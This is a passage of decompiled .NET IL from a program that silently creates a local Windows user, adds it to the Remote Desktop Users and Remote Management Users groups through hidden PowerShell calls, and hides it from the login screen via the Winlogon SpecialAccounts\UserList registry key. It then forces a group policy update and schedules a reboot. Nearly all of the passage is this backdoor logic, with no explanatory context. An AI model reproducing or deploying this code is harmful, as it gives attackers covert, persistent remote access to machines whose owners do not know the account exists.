System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_70 ldloc.s V_70 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0D4F: ldstr "powershell" ldloc.s V_70 brfalse.s IL_0D4E: endfinally ldloc.s V_70 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_68 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_71 ldloc.s V_71 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0DA8: ldstr "powershell" ldloc.s V_71 brfalse.s IL_0DA7: endfinally ldloc.s V_71 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-580') -Member ' ldloc.s V_68 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_72 ldloc.s V_72 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0E01: ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldloc.s V_72 brfalse.s IL_0E00: endfinally ldloc.s V_72 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) stloc.s V_73 ldloc.s V_73 ldloc.s V_68 ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) leave.s IL_0E30: ldstr "gpupdate" ldloc.s V_73 brfalse.s IL_0E2F: endfinally ldloc.s V_73 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_74 ldloc.s V_74 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0E7D: ldc.i4.1 ldloc.s V_74 brfalse.s IL_0E7C: endfinally ldloc.s V_74 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_48 ldstr Created and configured new user: ldloc.s V_68 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0ECA: ldloc.s V_48 ldstr Failed to create user ldloc.s V_68 ldstr , trying next call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0EB9: ldloc.s V_13 ldloc.s V_69 brfalse.s IL_0EB8: endfinally ldloc.s V_69 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_13 ldc.i4.1 <null> add <null> stloc.s V_13 ldloc.s V_13 ldloc.s V_67 ldlen <null> conv.i4 <null> blt IL_0C62: ldloc.s V_67 ldloc.s V_48 brtrue.s IL_0ED9: leave.s IL_0EF1 ldstr Failed to create any new user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0EF1: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_75 ldstr Error configuring user(s): {0} ldloc.s V_75 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0EF1: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un IL_0F88: leave.s IL_0F94 ldstr Initiating reboot in 2 minutes for admin ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr shutdown ldstr /r /t 120 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_76 ldloc.s V_76 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr Reboot command exit code: {0} ldloc.s V_76 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0F70: leave.s IL_0F94 ldloc.s V_76 brfalse.s IL_0F6F: endfinally ldloc.s V_76 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0F94: ret stloc.s V_77 ldstr Error initiating reboot: {0} ldloc.s V_77 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0F94: ret leave.s IL_0F94: ret ldloc.0 <null> brfalse.s IL_0F93: endfinally ldloc.0 <null> callvirt System.Void System.Threading.Mutex::ReleaseMutex() endfinally <null> ret <null> |